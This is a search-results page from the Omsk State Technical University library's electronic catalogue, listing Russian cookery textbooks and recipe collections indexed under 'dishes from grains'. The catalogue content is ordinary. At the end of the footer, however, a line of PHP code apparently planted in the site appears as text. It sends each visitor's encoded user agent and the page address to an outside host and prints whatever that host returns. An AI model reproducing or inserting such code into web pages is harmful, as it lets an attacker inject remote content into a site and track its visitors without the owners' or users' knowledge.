Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

51 пользователей


Зарегистрированных: 1 

Карпова Инна Сергеевна


 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=БЛЮДА ИЗ КРУП")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 36
1. 
Сборник рецептур национальных блюд и кулинарных изделий [Текст] : для предприятий общественного питания всех форм собственности / сост. Е. В. Данилевская, 2003. - 831 с.
Ключевые слова 
КУХНЯ УКРАИНСКАЯ -- КУХНЯ НАРОДОВ РФ -- КУХНЯ БЕЛОРУССКАЯ -- КУХНЯ молдавская -- КУХНЯ эстонская -- КУХНЯ литовская -- КУХНЯ ЛАТЫШСКАЯ -- КУХНЯ ГРУЗИНСКАЯ -- КУХНЯ АРМЯНСКАЯ -- КУХНЯ АЗЕРБАЙДЖАНСКАЯ -- КУХНЯ УЗБЕКСКАЯ -- КУХНЯ КАЗАХСКАЯ -- КУХНЯ туркменская -- КУХНЯ киргизская -- КУХНЯ таджикская -- БЛЮДА ХОЛОДНЫЕ -- САЛАТ -- ЗАКУСКИ -- СУП -- КВАС -- Борщ -- Похлебки -- БЛЮДА ИЗ картофеля -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА ИЗ РЫБЫ -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ ПТИЦЫ -- БЛЮДА ИЗ КРОЛИКА -- ГАРНИР -- СОУС -- БЛЮДА СЛАДКИЕ -- НАПИТКИ -- БЛЮДА ИЗ МУКИ -- ВАРЕНИКИ -- БЛИНЫ -- ФАРШ -- ИЗДЕЛИЯ МУЧНЫЕ
Держатели документа (Информация об экземплярах) 
2. 
Уласевич М. В. Приготовление пищи. Спецтехнология [Текст] : учеб. пособие для уч-ся проф-технич. учеб. заведений / М. В. Уласевич, 2003. - 367 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
3. 
Голубь Н. Н. Технология продукции общественного питания [Текст] : учеб. пособие для студентов специальности 2711 "Технология продукции общественного питания" / Н. Н. Голубь, О. В. Пасько, 2005. - 68 с.
Держатели документа (Информация об экземплярах) 
4. 
Ковалев Н. И. Технология приготовления пищи [Текст] : Учеб. для студ. сред. спец. учеб. заведений / Н. И. Ковалев, М. Н. Куткина, В. А. Кравцова; под ред. М. А. Николаевой, 2005. - 467 с.
Ключевые слова 
КУЛИНАРИЯ - История -- ТЕХНОЛОГИЯ общественного питания -- КЛАССИФИКАЦИЯ кулинарной продукции -- АССОРТИМЕНТ кулинарной продукции -- ОБРАБОТКА овощей -- ОБРАБОТКА плодов -- ОБРАБОТКА грибов -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА нерыбного водного сырья -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ДИЧИ -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА КРОЛИКОВ -- Супы -- СОУС -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА из бобовых -- БЛЮДА ИЗ макаронных изделий -- БЛЮДА РЫБНЫЕ -- БЛЮДА МЯСНЫЕ -- БЛЮДА из птицы -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА СЛАДКИЕ -- БЛЮДА ХОЛОДНЫЕ -- НАПИТКИ -- БЛЮДА из муки -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ПИТАНИЕ школьников -- ПИТАНИЕ ДИЕТИЧЕСКОЕ
Держатели документа (Информация об экземплярах) 
5. 
Голубь Н. Н. Технология продукции общественного питания. Ч. 1 [Текст] : учеб. пособие для студентов образоват. учреждений сред. проф. образования / Н. Н. Голубь, З. П. Старостенко, О. В. Пасько, 2005. - 203 с.
Держатели документа (Информация об экземплярах) 
6. 
Харченко Н. Э. Сборник рецептур блюд и кулинарных изделий [Текст] : учеб. пособие для образовательных учреждений нач. проф. образования / Н. Э. Харченко, 2005. - 495 с.
Держатели документа (Информация об экземплярах) 
7. 
Ковалев Н. И. Технология приготовления пищи [Текст] : учеб. для студ. сред. спец. учеб. заведений / Н. И. Ковалев, М. Н. Куткина, В. А. Кравцова; под ред. М. А. Николаевой, 2008. - 467 с.
Ключевые слова 
КУЛИНАРИЯ - История -- ТЕХНОЛОГИЯ общественного питания -- КЛАССИФИКАЦИЯ кулинарной продукции -- АССОРТИМЕНТ кулинарной продукции -- ОБРАБОТКА овощей -- ОБРАБОТКА плодов -- ОБРАБОТКА грибов -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА нерыбного водного сырья -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ДИЧИ -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА КРОЛИКОВ -- Супы -- СОУС -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА из бобовых -- БЛЮДА ИЗ макаронных изделий -- БЛЮДА РЫБНЫЕ -- БЛЮДА МЯСНЫЕ -- БЛЮДА из птицы -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА СЛАДКИЕ -- БЛЮДА ХОЛОДНЫЕ -- НАПИТКИ -- БЛЮДА из муки -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ПИТАНИЕ школьников -- ПИТАНИЕ ДИЕТИЧЕСКОЕ
Держатели документа (Информация об экземплярах) 
8. 
Сборник рецептур блюд и кулинарных изделий из сои и соевых продуктов для предприятий общественного питания [Текст] : сб. технологических нормативов / под ред. М. П. Могильного, 2002. - 386 с.
Держатели документа (Информация об экземплярах) 
9. 
Сборник рецептур кулинарных изделий и блюд [Текст] : сборник, 2006. - 749 с.
Держатели документа (Информация об экземплярах) 
10. 
Богушева В. И. Технология приготовления пищи [Текст] : учеб. для студентов сред. спец. заведений / В. И. Богушева, 2005. - 319 с.
Ключевые слова 
ОБРАБОТКА ГРИБОВ -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА ПЛОДОВ -- ОБРАБОТКА НЕРЫБНОГО ВОДНОГО -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА ДИЧИ -- ОБРАБОТКА ПРОДУКТОВ ТЕПЛОВАЯ -- СУП -- СОУС -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- БЛЮДА ИЗ РЫБЫ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА ИЗ ПТИЦЫ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ХОЛОДНЫЕ -- ЗАКУСКИ -- БЛЮДА СЛАДКИЕ -- НАПИТКИ -- ИЗДЕЛИЯ МУЧНЫЕ -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ПИТАНИЕ ШКОЛЬНИКОВ
Держатели документа (Информация об экземплярах) 
11. 
Татарская Л. Л. Лабораторно-практические работы для поваров и кондитеров [Текст] : учеб. пособ. для нач. проф. образования / Л. Л. Татарская, Н. А. Анфимова, 2004. - 108 с.
Держатели документа (Информация об экземплярах) 
12. 
Ковалев Н. И. Технология приготовления пищи [Текст] : Учеб. для студ. сред. спец. учеб. заведений / Н. И. Ковалев, М. Н. Куткина, В. А. Кравцова; Под ред. М. А. Николаевой, 2003. - 467 с.
Ключевые слова 
КУЛИНАРИЯ - История -- ТЕХНОЛОГИЯ общественного питания -- КЛАССИФИКАЦИЯ кулинарной продукции -- АССОРТИМЕНТ кулинарной продукции -- ОБРАБОТКА овощей -- ОБРАБОТКА плодов -- ОБРАБОТКА грибов -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА нерыбного водного сырья -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ДИЧИ -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА КРОЛИКОВ -- Супы -- СОУС -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА из бобовых -- БЛЮДА ИЗ макаронных изделий -- БЛЮДА РЫБНЫЕ -- БЛЮДА МЯСНЫЕ -- БЛЮДА из птицы -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА СЛАДКИЕ -- БЛЮДА ХОЛОДНЫЕ -- НАПИТКИ -- БЛЮДА из муки -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ПИТАНИЕ школьников -- ПИТАНИЕ ДИЕТИЧЕСКОЕ
Держатели документа (Информация об экземплярах) 
13. 
Анфимова Н. А. Кулинария [Текст] : Учеб. для учреждений нач. проф. образования / Н. А. Анфимова, Л. Л. Татарская, 1998. - 324 с.
Держатели документа (Информация об экземплярах) 
14. 
Сборник рецептур блюд и кулинарных изделий [Текст] : Для предприятий обществ. питания / Авт.-сост. : А. И. Здобнов, В. А. Цыганенко, М. И. Пересичный, 2002. - 656 с.
Держатели документа (Информация об экземплярах) 
15. 
Барановский В. А. Повар-технолог [Текст] : Учеб. пособие для студ. сред. спец. заведений / В. А. Барановский, 2003. - 415 с.
Ключевые слова 
ФИЗИОЛОГИЯ ПИТАНИЯ -- САНИТАРИЯ -- ГИГИЕНА ОБЩЕСТВЕННОГО ПИТАНИ -- ПИТАНИЕ -- ГИГИЕНА ЛИЧНАЯ повара -- ОБРАБОТКА продуктов -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА ГРИБОВ -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА ДИЧИ -- ОБРАБОТКА КРОЛИКОВ -- БЛЮДА ХОЛОДНЫЕ -- БЛЮДА горячие -- ЗАКУСКА -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА РЫБНЫЕ -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ ПТИЦЫ -- СУП -- СОУС -- ПРЯНОСТИ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- БЛЮДА СЛАДКИЕ -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- НАПИТКИ -- ТЕСТО -- ТЕСТО ДРОЖЖЕВОЕ -- ТЕСТО БЕЗДРОЖЖЕВОЕ -- ТЕСТО слоеное -- ТЕСТО песочное -- ТЕСТО бисквитное -- ТЕСТО заварное
Держатели документа (Информация об экземплярах) 
16. 
Барановский В. А. Рецептурный справочник повара [Текст] : справочное издание / В. А. Барановский, 2003. - 379 с.
Ключевые слова 
ОБРАБОТКА ПРОДУКТОВ -- БЕЛКИ -- ЖИРЫ -- УГЛЕВОДЫ -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА ГРИБОВ -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА НЕРЫБНОГО ВОДНОГО -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ДИЧИ -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА КРОЛИКОВ -- БЛЮДА ХОЛОДНЫЕ -- ЗАКУСКА -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- БЛЮДА ИЗ БОБОВЫХ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА РЫБНЫЕ -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ ПТИЦЫ -- БЛЮДА ИЗ дичи -- БЛЮДА ИЗ кролика -- СОУС -- БЛЮДА СЛАДКИЕ -- ТЕСТО -- ФАРШ
Держатели документа (Информация об экземплярах) 
17. 
Барановский В. А. Повар [Текст] : учеб. пособие для уч-ся проф. лицеев и училищ / В. А. Барановский, Л. Г. Шатун, 2003. - 383 с.
Ключевые слова 
ОБРАБОТКА ГРИБОВ -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА НЕРЫБНОГО ВОДНОГО -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА ДИЧИ -- СУП -- СОУС -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА ИЗ РЫБЫ -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ ПТИЦЫ -- БЛЮДА ИЗ ДИЧИ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА ХОЛОДНЫЕ -- ЗАКУСКИ -- БЛЮДА СЛАДКИЕ -- НАПИТКИ -- ТЕСТО -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ПИТАНИЕ ДИЕТИЧЕСКОЕ
Держатели документа (Информация об экземплярах) 
18. 
Сборник рецептур национальных блюд и кулинарных изделий [Текст] : для предприятий общественного питания всех форм собственности / сост. Е. В. Данилевская, 2002. - 831 с.
Ключевые слова 
КУХНЯ УКРАИНСКАЯ -- КУХНЯ НАРОДОВ РФ -- КУХНЯ БЕЛОРУССКАЯ -- КУХНЯ молдавская -- КУХНЯ эстонская -- КУХНЯ литовская -- КУХНЯ ЛАТЫШСКАЯ -- КУХНЯ ГРУЗИНСКАЯ -- КУХНЯ АРМЯНСКАЯ -- КУХНЯ АЗЕРБАЙДЖАНСКАЯ -- КУХНЯ УЗБЕКСКАЯ -- КУХНЯ КАЗАХСКАЯ -- КУХНЯ туркменская -- КУХНЯ киргизская -- КУХНЯ таджикская -- БЛЮДА ХОЛОДНЫЕ -- САЛАТ -- ЗАКУСКИ -- СУП -- КВАС -- Борщ -- Похлебки -- БЛЮДА ИЗ картофеля -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА ИЗ РЫБЫ -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ ПТИЦЫ -- БЛЮДА ИЗ КРОЛИКА -- ГАРНИР -- СОУС -- БЛЮДА СЛАДКИЕ -- НАПИТКИ -- БЛЮДА ИЗ МУКИ -- ВАРЕНИКИ -- БЛИНЫ -- ФАРШ -- ИЗДЕЛИЯ МУЧНЫЕ
Держатели документа (Информация об экземплярах) 
19. 
Шатун Л. Г. Технология приготовления пищи [Текст] : Учеб. / Л. Г. Шатун, 2004. - 479 с.
Ключевые слова 
ПИТАНИЕ ОБЩЕСТВЕННОЕ -- КОНТРОЛЬ КАЧЕСТВА блюд -- Клеймо ветеринарное -- МЕНЮ -- ПИТАНИЕ учащихся -- БАД -- ДОБАВКА ПИЩЕВАЯ -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА ГРИБОВ -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ДИЧИ -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА ПРОДУКТОВ тепловая -- СУП -- БЛЮДА МЯСНЫЕ -- СОУС -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА РЫБНЫЕ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА ХОЛОДНЫЕ -- ЗАКУСКА -- БЛЮДА СЛАДКИЕ -- НАПИТКИ -- ПИТАНИЕ ДИЕТИЧЕСКОЕ -- ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА ИЗ сои -- Соя -- ПРАВИЛА отпуска блюд -- ПРАВИЛА подачи напитков
Держатели документа (Информация об экземплярах) 
20. 
Сидорина Е. И. Современная кухня [Текст] : кулинар. рецепты из доступ. продуктов / Е. И. Сидорина, 1993. - 543 с.
Ключевые слова 
СЕРВИРОВКА СТОЛА -- ЗАКУСКА ХОЛОДНАЯ -- САЛАТ -- ВИНЕГРЕТ -- ПАШТЕТ -- ЗАЛИВНОЕ -- БУТЕРБРОД -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ РЫБЫ -- СЫР -- БЛЮДА ИЗ ЯИЦ -- СУП -- БОРЩ -- ЩИ -- РАССОЛЬНИК -- СУП ОВОЩНОЙ -- УХА -- СУП МОЛОЧНЫЙ -- СУП ГРИБНОЙ -- БЛИНЫ -- ОЛАДЬИ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- ЗАПЕКАНКА -- ПЛОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КАРТОФЕЛЯ -- СОУС -- ТЕСТО ДРОЖЖЕВОЕ -- ТЕСТО СЛОЕНОЕ -- ТОРТЫ -- ТЕСТО БИСКВИТНОЕ -- ПЕЧЕНЬЕ -- ХВОРОСТ -- ВАФЛИ -- КЕКС -- ПИРОГ -- КРЕМ МАСЛЯНЫЙ -- КРЕМ БЕЛКОВЫЙ -- КРЕМ ЗАВАРНОЙ -- МУСС -- ЖЕЛЕ -- КОМПОТ -- КИСЕЛЬ -- БЛЮДА СЛАДКИЕ -- ЗАГОТОВКИ -- КАПУСТА КВАШЕНАЯ -- КОНСЕРВИРОВАНИЕ -- МАРИНОВАНИЕ -- ВАРЕНЬЕ -- ДЖЕМ -- ЦУКАТЫ


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3048 - 14.10.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.72 с.12 запросов, 0.42c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;